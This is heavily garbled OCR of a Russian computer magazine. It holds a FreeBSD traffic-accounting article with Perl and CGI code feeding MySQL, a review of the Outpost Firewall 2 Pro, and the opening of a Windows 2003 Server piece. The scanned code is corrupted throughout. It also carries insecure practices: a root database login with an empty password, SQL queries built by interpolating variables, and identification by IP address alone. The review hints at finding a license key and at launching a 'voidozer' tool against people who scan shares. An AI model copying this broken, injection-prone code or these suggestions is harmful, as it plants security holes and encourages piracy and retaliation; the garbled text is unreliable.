дал. Там очень много ценной инфы 
(тем более, что все доки будут goc- 
тупны на диске). Не поленись. А те- 
перь переворачивай страницу, и 
мы попытаемся прикрепить к на- 
шей консольной системе полноцен- 
ный меб-интерфейс. 
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Очень 
интересный 
сайтик. Обяза- 
тельно озна- 
комься. Полу- 
чишь базовые 
навыки работы 
с UNIX. 


ситеп- 


(документация 
на русском о 
NeTAMS). 
Прочитай 
просто для gy- 
ши - много ин- 
тересного уз- 
наешь. 
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ПИШЕМ СКРИПТЫ ДЛЯ СИСТЕМЫ ТРАФИКА 
BO FREEBSD 


DemiurG (arkhangel@mail.ru) 


Каждому 
пользователю 
не объяснишь, 
что такое ssh, 
как туда зай- 
ти, да и ас- 
пект безопас- 
ности остает- 
ся, вдруг дога- 
дается что-ни- 
будь изме- 
нить. Самое 
простое и пра- 
вильное реше- 
ние этой траб- 
лы - создать 
меб-интер- 
фейс. 


Ну чего, разобрался с IPA? Теперь все пользователи у тебя под контролем? Ho 
почему-то боссы недовольны... Им хочется, чтобы не только ты один контролировал 


систему учета, но и чтобы они без твоего вмешательства могли просмотреть, сколько 
у пользователей там капает. 


а и сами юзера бунту- 
ют немного - им ка- 
жется, что некто (на- 
верное ты) накручивает трасфик и 
выдает неверные данные. Что же... 
Разубедим их в этом! 


ОТВЕТ ЕСТЬ ЭКВИВАЛЕНТ 
МЫСЛИ 

Если не забыл, в предыдущей статье 
мы создали полноценную систему 
трафика, но узнать по ней данные 
мог только админ с доступом по ssh. 
Согласись, что далеко не каждому 
пользователю объяснишь, что такое 
ssh, как туда зайти - да и аспект безо- 
пасности остается, вдруг догадается 
что-нибудь изменить. Поэтому мы бу- 
дем создавать friendly-user-interface. 
Самое простое (а в данном случае и 
правильное) решение - создать web- 
интерфейс. То есть у тебя в локалке 
работает ммеБ-сервер, который полу- 
чает данные от системы траффика и 
уже раскладывает их в аккуратную 
табличку. Но каким образом веб-сер- 
вер получит эти данные? Придется 
использовать базу данных. Я не буду 
мутить воду и полностью представлю 
свою наработку. Моя система Tpacpu- 
ка (как я и хотел) состоит из малень- 
ких кирпичиков, из которых уже 
складывается целое: 

1. Работает ipfw. Он считает тра- 
фик (так как в нем заданы необхо- 
димые правила). 

2. Вывод ipfw обрабатывает IPA. 
Это сделано для удобства. IPA явля- 
ется посредником между моим 
скриптом и ipfw. Плюсы в том, что 
они делают многие вещи, которые 
мне не нужно делать, - складыва- 
ют/вычитают данные, имеют 
собственную базу, то есть даже если 
твоя база радикально упала - всегда 
есть резервная текстовая копия. 

3. Вывод IPA обрабатывает скрипт 
ipastat.pl. Он заносит все данные в 
базу MySQL (можно выбирать любую 
другую - это личное дело каждого). 

4. Выборку из базы делает скрипт 
mysql.cgi. Данные получаются в виде 
очень милой лаконичной таблицы. 

Если с первыми двумя шагами все 
ясно (мы их рассмотрели в предыду- 
щих двух статьях), то каким образом 
обрабатывать вывод IPA - непонят- 
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но. Я решил не делать выборку из 
его текстовой базы (она чересчур 
примитивна и сложна для работы) и 
обрабатывать вывод напрямую. Ес- 
ли мы запустим ipastat с ключом -п 
(ipastat -х -R . -п), то получим данные 
по всем пользователям без табли- 
цы, и эти данные можно отлично об- 
работать в Перле. Для каждого 
пользователя в IPA должно быть 
создано одно правило вида: 


rule admin { 

info = 192.168.6.200 

ipfw = 190 195 

startup { 

exec = /sbin/ipfw add 190 allow ip from 
192.168.6.200 to any via xl0 

exec = /sbin/ipfw add 195 allow ip from any 
to 192.168.6.200 via xl 

exec = /sbin/ipfw add 197 allow ip from any 
to 192.168.6.200 via xl0 

} 

} 


Обязательно задавать в поле info 
ip юзера, так как это поле заносит- 
ся в базу и по нему происходит рас- 
познание имени. 

Я надеюсь, тебе не надо объяс- 
нять, как админить mysql. Ниже 
привожу скрипт (ipastat.pl) с ком- 
ментариями: 


#!/usr/bin/perl -w 
my (Smtime, Snow, Snows, Suser, Sip, Ssum, 
@users, Smb, @ips, @mbs, Sline, @sums, 
Susers, Ssums, Sips, Smbs, $query, Srule); 
use strict; 
use DBI; 
## в переменную $mtime мы заносим те- 
кущее время 
$mtime=" date +%Н`; 
chomp Smtime; 
## это кусок кода проверяет, какое время, 
и “включает интернет" путем вызова ipa; 
согласись, если уже 9 вечера, то на фир- 
ме сотрудников нет, и инет никому не ну- 
жен, а в 9 утра мы как раз его включаем 
if (Smtime == “09") { 

system ‘/usr/local/bin/ipa’: 


} 
elsif (Smtime == “21") { 
system ‘/usr/local/bin/ipa -k shutdown’: 


4 в базу падают последние данные 
system ‘/usr/local/bin/ipa -k dump’; 


Вот так он будет выглядеть в твоем лю- 
бимом браузере (если, конечно, у тебя 
получится его поставить) 


#4 получаем текущее время 

Snow = “date +%Y.%m.%d": 

Snows = Snow; 

chomp Snow; 

Snows =~s /\./-/g; 

## получаем данные OT ipa путем вызова 
ipastat с текущим выводом 

open (FILE, “/usr/local/bin/ipastat -x -R . -1 
Snow -п |") || die “Cannot ipastat -x -R $!\n"; 
## первая строка нам не нужна (удаляем 
ее) 

Sline=<FILE>; 

HH обрабатываем полученный вывод 
while (Sline=<FILE>) { 

Sline =~ s/\s+/ /; 

chomp Sline; 

Е разбиваем вывод Ha несколько пере- 
менных, из которых создаем массивы. В 
базе (которая состоит из одной таблицы) 
находятся имена пользователей, их ip-ag- 
реса (по ним происходит идентификация), 
сколько они выкачали в байтах, сколько 
они выкачали в мегабайтах. 

my (Suser, Sip, Ssum) =split (/ /, Sline); 

HH мегабайты получаются делением байт 
на 1048576=1024*1024 . Хотя может делить 
на 1000000 

Smb=Ssum/(1024*1024); 

push @users, Suser; 

push @sums, Ssum; 


push @ips, Sip; 
push @mbs, Smb; 
} 


## выполняем подключение к базе дан- 
ных (traff2) с логином root и пустым паро- 
лем (нехорошо). Не забудь изменить. 
ту (Sdsn) = “DBI:mysql:traff2”; 

my (Suser_name) = “root”; 

my (Spassword) =""; 

my (Sdbh, Srows, Srow); 

my (@ary); 

$dbh = DBl->connect (Sdsn, Suser_name, 
Spassword, {RaiseError => 1}); 

Н кидаем полученные данные в базу 
foreach Susers (@users) { 


a ae 


$sums = shift (@sums); 

Sips = shift (@ips); 

$mbs = shift (@mbs); 

Я при каждом запуске мы проверяем, 
есть ли за такую дату и для такого пользо- 
вателя данные, и если их нет, делаем 
insert, а если есть - update . 

Squery = “select count(*) from traffik where 
date="Snows’ and name="Susers’” or die; 
Srule = Sdbh->selectrow_array(Squery); 

if ( $rule==0) { 

НЕ вся база состоит из одной таблицы 
(traffik), с нею мы и работаем 

Srows = Sdbh->prepare (qq { insert into 


Srows->execute(“Snow”, “Susers”, “Sips”, 
“ит”, “Smbs"); 

} ее { 

Srows = Sdbh->prepare (qq {update traffik 
set info ="Ssums’, mb='$mbs’ where 
name='Susers’ and date='Snows’}) or die; 
Srows->execute(); 

} 

} 

close FILE; 


Разумеется, для Toro чтобы все 
работало, создай базу: 


create database traff2; 
и таблицу: 


CREATE TABLE traffik ( 


Se + 


Если данные за период не найдены - 
возвращается ошибка 


date date default '0000-00-00', 
name varchar(15) NOT NULL default ", 
ip varchar(15) NOT NULL default “, 
info int(15) NOT NULL default ‘0’, 

mb float(4,2) NOT NULL default ‘0.00’ 
) TYPE=MyISAM; 


Отлично, база у нас есть. Теперь, 
для того чтобы делать из нее вы- 
борку, создадим меб-интерфейс 
(mysql.cgi). Он будет представлять 
собой cgi приложение, написанное 
на Перле - текст слишком длинный, 
поэтому привожу отдельные части. 
Он разбит на две части - код для 
юзеров (непривилегированные) и 
для боссов с админом (привилеги- 
рованные). Отличаются они тем, 
что боссы (или админ) могут выби- 
рать пользователя и смотреть, ка- 
кой у него трафик. Пользователь 
может смотреть только у себя (не 
пойми превратно). Все распознава- 
ние делается на уровне ip-agpeca, 
то есть если ты админ и у тебя ip- 
адрес 192.168.6.200, то скрипт кон- 
нектится к базе, делает выборку за 
последнее число и говорит: "Да ты 
admin", и перенаправляет на код 


“для боссов". Все это делается в 
строках: 


$$ = Sdbh->prepare (qq {select name from 
traffik where ip='Sip’ order by ip desc}) ог 
die; 

Ssth-»execute; 
Sname=Ssth->fetchrow_array(); 

print “<div align=right><b><font 
со!ог=гед>[пользователь Sname в систе- 
me]</font></div>"; 


А проверка на админа в самом начале: 
"И (Sname пе “admin")...", хотя это 
и так понятно в принципе. 


Бацая скрипт, я использовал мо- 
дули: CGI (входит в поставку Perl) - 
позволяет обращаться к интерфей- 
cy CGI. Через CGI мы получаем ip 
пользователя: 


my Sip=SENV{REMOTE_ADDR}; 
через который уже узнаем его имя. 


СС1::Сагр - выводит сообщение об 
ошибке прямо в экран браузера. 
Очень удобно для отладки. 
http://search.cpan.org/CPAN/authors/ 
id/L/LD/LDS/CGI.pm-2.97.tar.gz 


DBI - интерфейс для работы с ба- 
зой, может еще потребоваться 
DBD::MySQL. 
http://search.cpan.org/CPAN/ 
authors/id/T/TI/TIMB/DBI-1.37.tar.gz 
http://search.cpan.org/CPAN/ 
authors/id/R/RU/RUDY/ 
DBD-mysal-2.9002.tar.gz 


Tie::IxHash (http://search.cpan.org/ 
CPAN/authors/id/G/GS/GSAR/ 
Tie-IxHash-1.21.tar.gz) сортирует клю- 
чи хэша (это требуется при выводе 
месяцев, так как они представляют 
собой хэш и требуется, чтобы фев- 
раль шел после января, ну и т.9д.): 


tie Ymonth, “Tie:IxHash”: 


Y%month=(‘sHBapb'=>"01", ‘MeBpanb’=>"02", 


‘март=>”03", ‘anpenb’=>"04", ‘Mait’=>"05", 
‘июнь’=>”06", ‘июль’=>'0Т’, ‘aBryct'=>'08', 
‘сентябрь’=> 09", ‘октябрь’=>10', ‘HO- 
AOpb'=>'ll’, 'декабрь'=>12'); 


Скачать все можно с http://search. 


cpan.org/. Установка стандартная: 


perl Makefile.PL ; 
make 
make test 


Выборка данных по админу 


Вот так выглядит сама база, именно из 
нее мы берем ip-agpeca пользователей и 
составляем их с именами. 


make install 


Для того чтобы создать таблицу 
(с уже заполненными данными), я 
использовал такой нехитрый цикл. 


while (@ary = Ssth->fetchrow_array()) 


{ 

print “<TR>\n"; 

print (“<ТО>", shift (@ary)) while @ary; 
print “</TR>\n"; 

} 


В массиве @ary уже есть данные, 
полученные отсюда: 


Ssth = Sdbh->prepare (qq {select date, mb 
from traffik where name="Sname’ and date 
like ‘Syear-Smonth-%'}) or die; 
Ssth->execute(); 
Sary=Ssth->fetchrow_array(); 


Ha всякий случай (для лучшего 
понимания) скрины. 


Теперь ты все понял: с помощью 
скрипта ipastat.pl (а точнее - коман- 
ды “ipastat -х -R . -п") мы обрабаты- 
ваем вывод IPA, в результате чего 
создается (или обновляется) табли- 
ца traffik в базе traff2. Юзер заходит 
на веб-сервер, и благодаря инструк- 
ции “my Sip=SENV{REMOTE_ADDR};” 
мы узнаем его ip -> ищем последнюю 
запись в базе по этому ip -> находим 
-> получаем его имя - и уже делаем 
выборку по его имени. Если сеть бо- 
лее глобальная и небезопасная, 
можно к апачу (на котором крутится 
mysql.cgi) прикрепить аутентифика- 
цию, но это уже твое личное дело. 


ЭКИПАЖ ПРОЩАЕТСЯ С ВАМИ 
Скрипты всегда ты можешь ска- 
чать/найти на Cd-rom, который при- 
лагается к журналу. Файл называет- 
ca trafik.zip. В этом архиве рабочий 
ipa.conf, sql скрипт для создания таб- 
лицы, ipastat.pl и mysql.cgi. Если бу- 


Скрипт выдаст 
статистику 
как простому 
юзеру, так и 
боссам: боссы 
(или админ) 
могут выби- 
рать пользо- 
вателя и смот- 
реть, какой у 
него трафик, 
юзер может 
смотреть 
только у себя 
(не пойми 


превратно). 


дут траблы или просто добрые noxe- jf 


лания - пиши на arkhangel@mail.ru. 


горшочки с медом слать туда же... 
Снюхаемся стопудняк!! 


ИИ 
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OUTPOST 2 PRO 


СТАВИМ ПЕРСОНАЛЬНЫЙ ФАЙРВОЛ 
НА СЕТЬ... И ВЫИГРЫВАЕМ! 


Alex Shark 
(qqqqqwww@e-mail.ru) 


OT и вышла новая версия из- 

вестного файрвольчика. 

Брать данную прелесть, как 
всегда, на Www.agnitum.com, за скачива- 
ние денег не берут, но работать будет 
только первый месяц. Далее, как всегда, 
для себя ищем ключик, для фирмы выби- 
ваем бабки. Изменился дизайн, кнопочки 
стали более ХР-подобными. Все что может 
двигаться, двигается плавно. Не забыт и 
русский интерфейс, благодаря которому 
большинство пользователей быстрее 
настроит прогу под себя. Стоит сейчас 
прога 40 вечнозеленых, если для себя, и 
1000, если тебе надо на сетку пользовате- 
лей. Если будешь ставить на солидную 
фирму, то лучше выбить немного денег, 
дабы потом спать спокойней. 

Сам по себе файр нужен практически 
всем, кто работает с сетью, а не просто 
так вышел пописать. Отмазки типа “ga 
нас никто не ломает" или “ga кому нужен 
мой сервачок" не прокатят. Рано или 
поздно наступит момент, за который мож- 
но просто лишиться работы. 


НОВЫЕ НАСТРОЙКИ 

Начнем с установки. Если у тебя win2k 
или ХР, ая надеюсь, что ты уже переполз 
на солидную систему, то смело выставляй 
“грузить как сервайс". Во второй версии 
эта фича реально работает и подгружает 
файр еще до логина, что очень полезно 
при пользовании его на серваке. Тут же 
Outpost попробует настроить стандартные 
проги и прописать для них правила. В эти 
проги попадут не только IE и ICQ, он от- 
лично отлавливает Bat, ГАК и прочую ку- 
чу приятной мелочи. После установки пе- 
регрузи тачку, иначе ничего работать не 
станет. Если решил апгрейдить первую 
версию, то лучше сначала снести ее, наст- 
ройки все равно не перекочуют. После ре- 
бута прога должна загрузиться автоматом 
и начать спрашивать настройки для ак- 
тивных прог. 

Прежде всего настрой плагины. Как для 
дома, так и для офисного сервера сове- 
тую оставить DNS, Attack detection и 
Advertisement Blocking. Если есть жела- 
ние порезать порнушку для сетевых юз- 
верей, врубай еще и Content Filtering. 
Настройки для плагинов остались теми 
же, что были в версии 1.0. 
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Далее настраивай “Общие” параметры 
файрволла, тут есть несколько вариантов 
загрузки. Обычный, это когда он грузится 
как раньше, после входа пользователя. 
Фоновый режим - это значит грузиться gO 
входа пользователя в виде сервайса и не 
подгружать управляющую часть (тот са- 
мый значок в трее). При этом режиме все, 
что ты настроил, продолжает работать, 
только никому это не видно. Не загру- 
жать, оно ив Африке... Режим в принципе 
бесполезен, так как можно просто поста- 
вить “бездействие”. Может помочь, если 
у тебя возникли коллизии с другим фай- 
ром или просто полезли глюки. Защита 
паролем необходима, если не ты один мо- 
жешь шариться по серверу, но порнуху 
резать должен именно ты. 

Далее идут настройки реакции на раз- 
личные проги. Тут тоже появилось нес- 
колько положительных дополнений. Нап- 
ример, в правилах есть возможность не 
только разрешить, блокировать или отк- 
лонить данные. Теперь можно подклю- 
чить “динамическую фильтрацию”, то 
есть контроль не на пакетном уровне, а 
на уровне сессии. Можно заблокировать 
и написать тебе кляузу или разрешить и 
написать кляузу. То есть еще один плюс 
в роли большого брата для сети. Удобно 
добавить сюда delit.ru, гтр.ги и смот- 
реть, кто это у нас самый музыкальный. 
Ну и, наконец, моя любимая опция “За- 
пустить приложение”. Тут уж на что тво- 
ей совести хватит. Например, можно за- 
пускать voidozer и ему подобные препа- 
раты, дабы отучать сканировать шары. 
Можно запустить winamp и звук сирены 
в серверной. Можно просто запускать 


| 
Детектор атак, больше нет лога в окне 


дополнительный логер, в общем - 
решай, что тебе нужно. Запрещен- 
ные и разрешенные группы ничем 
не отличаются от предыдущей 
версии. В закладке “системные” 
появилась реальная фича “Наст- 
ройка сети". Тут ты можешь разре- 
шить NetBIOS для свой локалки и, 
соответственно, запретить его 
всем остальным. Тут же можешь 
выставить флажок "доверенные", 
что значит - “им можно все". Оп- 
ция полезна при установке 
VMWare и ей подобных прог. Что- 
бы не париться с настройкой, 
просто занеси свою сеть-виртуал- 
ку в доверенные. Параметры ICMP, 
как всегда, радуют глаз, можно 
настроить так, что тебя никто не 
видит, а ты спокойно пингуешь 
все и вся. Режим невидимости ос- 
тался на прежнем уровне. Появи- 
лась еще одна полезная фича, 
"Общие правила". Тут ты можешь 
назначить разрешенный или зап- 
рещенный порт/сервер, и это пра- 
вило станет общим для всех прог- 
рамм. Крайне полезно использо- 
вать, сидя за проксиком. Можно 
разрешить коннект на порт 8080 
для всех прог и больше не парить- 
ся, рассказывая Аутпосту про каж- 
дую отдельно. Вкладка политики 
осталась функционально не изме- 


ненной, изменились только дизайн 
и очередность кнопочек. После то- 
тальной настройки можно ткнуть в 
"Мой Интернет", там есть отлич- 
ная ссылка "Пройти on-line тест". 
Тебя отсканируют по самые поми- 
доры. Если ты сидишь дома и все 
настроил правильно, сканер дол- 
жен вообще усомниться в сущест- 
вовании такого компьютера. Если 
ты настраиваешь файрволл на 
серваке с выходом в и-нет, то под- 


в разряд “можно все". Лучше по- 
мучиться с правилами, но настро- 
ить их как надо. В идеале в разде- 
ле “можно все” программы нахо- 
дятся лишь временно и недолго. 
Если трудно с настройкой, создай 
аналогичное правило и повесь на 
него “дать отчет". Так ты сможешь 
более детально изучить деятель- 
ность твоей проги и найти законо- 
мерности ее работы. 


НОВОСТИ КОДА 

Теперь давай глянем на “пем” 
функции. Первая же фича, “Anti- 
Leak", оказалась на практике очень 
работоспособной. Если раньше че- 
рез неделю работы сервака в памя- 
ти OutPost начинал отжирать по 
100-200 метров, то теперь он смот- 
PUT не только за своими “хвоста- 
ми”, но также предотвращает “Hen- 
равильно" завершенные соедине- 
ния и рубит на корню неправильно 
начатые. То есть, если ты попробу- 
ешь послать первый пакет ТСР с 
установленным RST флагом, то сое- 
динение будет просто убито. То же 
самое происходит при таймауте. То 
есть, если ты нажал reset, а прок- 
сик забыл об этом предупредить. 
Каким бы кривым ни был код прок- 
сика, OutPost срежет это соедине- 
ние и освободит память. Далее 


Firewall нужен практически всем, 
кто работает с сетью, а не просто так 
пописать вышел. 


робно посмотри ответ. Не забы- 
вай, что IIS (если этот кошмар у те- 
бя присутствует) должен уметь 
только “принимать” и только по 
80 порту. Тогда, даже в случае 
взлома, от тебя трудно будет по- 
лучить шелл. То же самое со все- 
ми серверами, которые разверну- 
ты мордой в и-нет. Помни, что не- 
ломаемых серверов нет. Если наст- 
раиваешь корпоративный сервак, 
то дважды, а лучше трижды поду- 
май, прежде чем перенести прогу 


Поимей себя сам, прежде чем это сделал кто-то друг 


идет “Stateful Inspection”, это та са- 
мая “динамическая фильтрация": 
раньше OutPost обращал свое вни- 
мание на пакеты и, пропуская их 
через себя, фильтровал все, что в 
них летит, только по заранее ого- 
воренным правилам. Теперь, если у 
тебя стоит FTP сервер, то файр- 
волл посмотрит, какой порт поле- 
тел в команде “PORT”, и разрешит 
соединение только на этот порт. Ес- 
ли ты не посылал пинга, то он не 
пропустит и ответ. В общем, 
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http://www. 
symantec.com/ 
techsupp/nis/ 
files_nis.html - 
ближайший 
конкурент по 
функциональ- 
ности. 


http://www. 
peflank.com/ 
articles.htm - 
полезный 
сайт. 
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NAT Ha ocHoBe 
Windows мож- 
но защитить 
с обеих сторон 
одним файр- 


Outpost смотрит на условия до сес- 
сии и в зависимости от них исполь- 
зует правила после. 

Далее идет описание супер-пупер 
boot-up protection, реальной поль- 
зы на домашней тачке от нее я не 
заметил. Поставил себе BO2K, заг- 
рузился, зашел в Винду, выскочило 
окошко типа “тут чувак слушает че- 
то". До этого коннекта с БякОрифи- 
сом не было. В принципе, раньше 
происходило то же самое, с той 
лишь разницей, что пользователь 
должен был быть залогинен, иначе 
творилась полная анархия. Зато те- 
перь оставлять файр в режиме 
“обучения” на серваке я крайне не 
советую. После логона он задолбит 


паи нение stein 


Сколько раз OH спас твои глаза 


тебя окошками недельной давнос- 
ти, если какой-нибудь чудик решит 
тебя сканировать. 

Далее в новшествах система ло- 
гирования на принципах базы дан- 
ных. Если быть точным, это стан- 
дартный Access-oBckun mdb файл. 
При желании можешь написать 
свою читалку логов. Но плюс это 
или минус - решать тебе, позже я 
расскажу, почему. Далее почему- 
то в качестве нового фигурирует 
“Banner-ad blocking”, хотя эта 
функция так и осталась без ма- 
лейшего изменения. Единствен- 
ное, что добавили разработчики, 
это кнопка “включить корзину” в 
панели IE, и немного расширили 
базу с запрещенными строками. 
Далее нам рассказывают, что те- 
перь все установить и настроить 
стало проще и легче. Но на деле 
это оказывает мало помощи опыт- 
ным пользователям, хотя и добав- 
ляет удобства новичкам. Далее 
идет функция “Internet connection 
sharing”, которая не поддержива- 
лась официально в 1-й free Bep- 
сии, но при этом нормально рабо- 
тала. В Рго версии о работоспо- 
собности заявили официально. 
Стандартные настройки для ICQ 
по-прежнему остались на уровне 
“качай баннеры, шли почту”, что 
лично меня не радует. Поэтому 
после установки настоятельно ре- 


me 
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комендую пройтись по всем “pre- 
defined” правилам со скальпелем 
и отрезать все лишнее. 


ПРИКЛАДНАЯ ЖУРНАЛИСТИКА 
Для корректного слежения за тем, 
что творилось на машине, теперь 
существует журнал. Попасть в жур- 
нал можно прямо из файрволла. 
Если выбрать "Разрешенные", 
"Заблокированные" или любой 
плуг, появится кнопочка “Показать 
журнал”. Сам журнал является от- 
дельной программой, что позволяет 
запускать его без запуска файр- 
волла. То есть на сервере, чтобы 
посмотреть любителей порно, те- 
перь достаточно запустить журнал. 
В журнале можно по дереву выб- 
рать любой плуг, даже если он ос- 
тановлен. Тут же можно выбрать 
несколько стандартных фильтров, 
например - “Последние 10 атак". В 
журнале также отражаются общие 
изменения, такие как остановка 
файрволла, запись и чтение кон- 
фигурации (и полный путь, где хра- 
нится файл). Все это можно посмот- 
реть во вкладке “Журнал системы". 
Очень помогает при неизвестной 
перезагрузке компа. Можно посмот- 
реть, что предшествовало перезаг- 
рузке (сканирование или долбеж 
одного порта). Зайдя в историю, 
можно посмотреть, кто и куда ходил 
и почему ему, собственно, было 
позволено это сделать. Тут можно 
делать различные сортировки и ус- 
танавливать фильтры. С сортиров- 
кой все нормально, достаточно 
кликнуть по заголовку той колонки, 
по параметру которой ты хочешь 
отсортировать. С фильтрами все 
немного более наворочено. Напри- 
мер, можно отсортировать по про- 
должительности, при этом время 
задать не точно, а “примерно”. В 
случае “примерно 5 минут" попали 
все соединения от 7 минут и мень- 
ше. Допускаются также двойные 
фильтры. Например, где локальный 


адрес 10.10.10.10 и приложение 
emule.exe. При фильтрации no при- 
ложениям на выбор тебе дадут все 
приложения, которые засветились 
в логе. Если ты один раз выбрал и 
настроил фильтр, он появится в де- 
реве. Так можно настроить фильтр 
для “Сегодня” или "Вчера" и потом 
всегда ими пользоваться. Можно не 
мучиться с настройками фильтра, а 
просто ткнуть в понравившуюся 
надпись и сказать “оставить выб- 
ранное" или “исключить выбран- 
ное". Под понятие “выбранное” 
подпадает конкретная ячейка, в ко- 
торую ты ткнул мышой. Данный 
фильтр не сохраняется как допол- 
нительный, поэтому после того как 
ты перейдешь в другую ветку, смот- 
релка лога просто забудет, что ты 
ее просил сделать. Однако кнопка 
"Обновить" не сбивает настройки. 
Для каждого плагина есть свои 
фильтры. Для обреза рекламы есть 
фильтр по умолчанию "наиболее 
часто блокируемые"”, но можно go- 
бавить свои. Для этого надо выб- 
рать в дереве сам фильтр и затем 
кликнуть “Добавить фильтр". Для 
рекламы ты уже не увидишь при- 
вычные “исходящий порт" и "ло- 
кальный адрес". Тут уже есть кате- 
гории “Действие”, по которому бу- 
дет ясно, что было блокировано, 
графика, сам запрос рекламы или 
просто параметры блокировки были 
найдены в таблице ссылок и разме- 
ров. В журнале DNS можно посмот- 
реть последние записи. Это nocneg- 
ние посещаемые сайты, на которые 
90 этого никто не ходил. Если на 
плагине никакие дополнительные 
фильтры добавить не дают, значит 
или там нет записей, или данный 
плагин вообще выключен. Ну и са- 
мый интересный плагин, “Детектор 
атак". Тут можно много чего пос- 
мотреть. Например, можно сделать 
фильтр для отлова Voidozer. Для 
этого достаточно в фильтре ука- 
зать действие "Фрагментирован- 


Детальная настройка фильтра просмотра лог-файла 
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ный IGMP". Тут же можно NOCMOT- 
реть на сканирование портов, кто и 
как часто пытается его проделать. 
Из журнала можно "Экспортиро- 
вать" данные. При этом создается 
обычный текстовый файл с разде- 
лителем табуляцией. Такой файл 
очень удобно импортировать в 
Excel для последующей обработки 
и распечатки. Также удобно делать 
экспорт с последующей очисткой 
журнала, дабы не засорять его ста- 
рыми записями. Своеобразный руч- 
ной бэкап. Наиболее используемые 
фильтры можно добавить в избран- 
ное, чтобы в будущем быстрее на- 
ходить интересующие записи. Из 
журнала можно также легко перей- 
ти в OutPost. Для этого достаточно 
нажать Е7 или выбрать “показать 
Outpost” в меню “Bug”. Журнал сам 
по себе не обновляется, для обнов- 
ления надо нажать “Обновить” или 


Работа с логом напрямую через 
SQL Explorer 


стандартное F5. Camo появление 
журнала должно сильно обрадо- 
вать всех админов. Ведь раньше, 
если машина ребутнулась, то это 
значило, что логов файрволла 
можно больше и не найти. Теперь 
все это будет лежать аккуратной 
кучкой на винте. 


РЕАЛЬНЫЕ ПЛЮСЫ 

ОТ АПГРЕЙДА 

Теперь давай разберемся, надо оно 
тебе или нет. Новый файрволл не 
грузит память вне зависимости от 
того, сколько времени подряд не 
было ребута, что для Windows-npor- 
рамм несравненный плюс. Это осо- 
бенно хорошо чувствуется при уста- 
новке на сервере. Если раньше ре- 
бут раз в три дня был как с добрым 
утром, то теперь раз в неделю, и то 
редкость. Не надо почить сервак 
под пользователем, что для адми- 
нов просто спасение. Все грузится 
автоматом и поднимается с момента 
старта Виндов. Улучшен отлов бан- 
неров благодаря большему числу 
предустановленных размеров и 
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Быстрый способ настройки временного фильтра просмотра 


строк, а следовательно, не надо ло- 
вить каждый баннер и тащить его в 
корзину. Видимо, авторы провели 
социологический опрос среди поль- 
зователей версии 1.0 и немного рас- 
ширили базу. А может быть, посади- 
ли какого-нибудь несчастного ла- 
зить по и-нету и искать все банне- 
ры, кнопочки и счетчики. Жирный 
плюс от “доверенных” сетей, нет 
больше геморроя с локалками и 
виртуальными тачками. Для быстро- 
ты можно настроить свою машину 
на сервере как доверенную и подк- 
лючаться как хочешь, в то время 
как юзеры будут довольствоваться 
тремя портами. Не стоит забывать 
про “общие правила", особенно хо- 
рошо настраивать правило для 
проксика, если ставить OutPost на 
своем компе в сети. Также удобно 
настраивается контроллер домена - 
если удаленный адрес 10.10.1010, то 
разрешить. И, само собой, толковый 
лог событий. Для домашнего ис- 
пользования плюсов меньше - 
меньшее количество глюков и бо- 
лее простая и удобная настройка. 
При использовании на проксике или 
прямо перед ним плюсов значитель- 
но больше, скорее всего данная 
версия рассчитана больше на адми- 
нов локальных сетей. 


ЗАБЫТЫЕ ХОРОШИЕ ФИЧИ 
Однако не все так гладко. Например, 
жутко не понравилось, что теперь, 
чтобы посмотреть, работает новое 
правило или нет, необходимо лезть 
в журнал. А если файрволл стоит 
уже несколько дней, одна только 
загрузка журнала - это добрые 1-2 
минуты. Также был изменен элемент 
для отображения сетевых подклю- 
чений и открытых портов. Если 
раньше можно было, как и в журна- 
ле, кликнув по заголовку, отсорти- 
ровать по той колонке, которая 
больше нравится, то теперь заголо- 
вок просто функционально не акти- 
вен. Хотя группировка еще работа- 
ет, и ее можно хоть как-то использо- 


вать. Однако посмотреть, кто из 
приложений у нас самый наглый и 
жрет по скорости больше всех, те- 
перь не получится. То же самое со 
всеми плагинами. В плагине "Детек- 
тор атак” теперь можно посмотреть 
только самое последнее соедине- 
Hue, a не последние 5-10. В плагине 
“Реклама” и того хуже. Видно толь- 
ко, сколько было заблокировано, а 
кто пытался скачать баннер, откуда, 
почему запретили - за всей этой ин- 
рой надо лезть в журнал. Также не 
совсем понятно: если журнал и 
файрволл это две отдельных проги, 
то почему я не могу со своей маши- 
ны и пользователем с правами go- 
менного админа посмотреть журнал 
на сервере. Версия стала во многом 
лучше, но потеряла несколько 
очень удобных фич. 


НОВАЯ ВЕРСИЯ, НОВЫЕ ГЛЮКИ 
При неправильном выходе из маст- 
дая с последующим запуском жур- 
нала может появиться окошко, что 
журнал испорчен и его надо вос- 
становить. Восстановление можно 
запустить из меню "Файл", только 
оно не запустится. Оно отметится 
как "обязательное к выполнению". 
Тут же можно выбрать “Удалить 
базу и создать новую" и посмот- 
реть, как же зовется файл. При 
следующем запуске файл будет 
благополучно грохнут, и на его 
месте появится новенький. Только 
вот пароль для этого спрашивать 
никто не будет. Все пройдет на ав- 
топилоте. Для админа это доста- 
точно большой минус. Тем более, 
что запустить журнал можно всем, 
и пароль на настройки тут не помо- 
жет. Не иметь программы журнала 
на сервере нельзя, так как удален- 
ная работа с журналом не поддер- 
живается. Если не считать этого и 
еще пары мелких глюков, софтина 
все-таки выросла в полноценный 
серверный файрволл. А это со всех 
сторон очень хорошо. 
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Если настраи- 
ваешь корпо- 
ративный сер- 
Bak, то дваж- 
ды, а лучше 
трижды Nogy- 
май, прежде 
чем перенести 
прогу в разряд 
"можно все". 


Стоит прога 
40 вечнозеле- 
ных для лич- 
ного исполь- 
зования. 
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SOFT/HOBOE - ЭТО ХОРОШО ЗАБЫТОЕ СТАРОЕ 


Mr. False 
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Славная мало- 
известная кор- 
порация Мик- 
рософт час- 
тенько радует 
нас новыми 
продуктами, 
которые вновь 
и вновь рас- 
ширяют гра- 
ницы нашего 
понимания ре- 
альности. 


В хелпе утве- 
рждается, что 
для нормальной 
работы серван- 
та нужно пос- 
тоянное подк- 
лючение к Ине- 
ту и зарегист- 
рированное go- 
менное имя, но 
нам, людям со- 
ветским, на та- 
кие мелочи за- 
бить =). 


раде 


(mr_false@deeptown.org) 


от буквально совсем 

недавно они велико- 

душно обрадовали 

нас своим новым ge- 
тищем, которое мы теперь можем 
потрогать и помять с удовольстви- 
ем. Или без... 


ПЮхХлЛЫЙ ДЯДЯ 

С ПУЗЫРЬКАМИ... 

Итак, чего они приготовили нам на 
сей раз? А ничего принципиально 
нового. Добротная серверная ось 
Windows 2003 Server, заботливо 
разделенная на несколько редак- 
ций, ориентированных на юзверей 
с различными потребностями и воз- 
можностями. В данном случае нам 
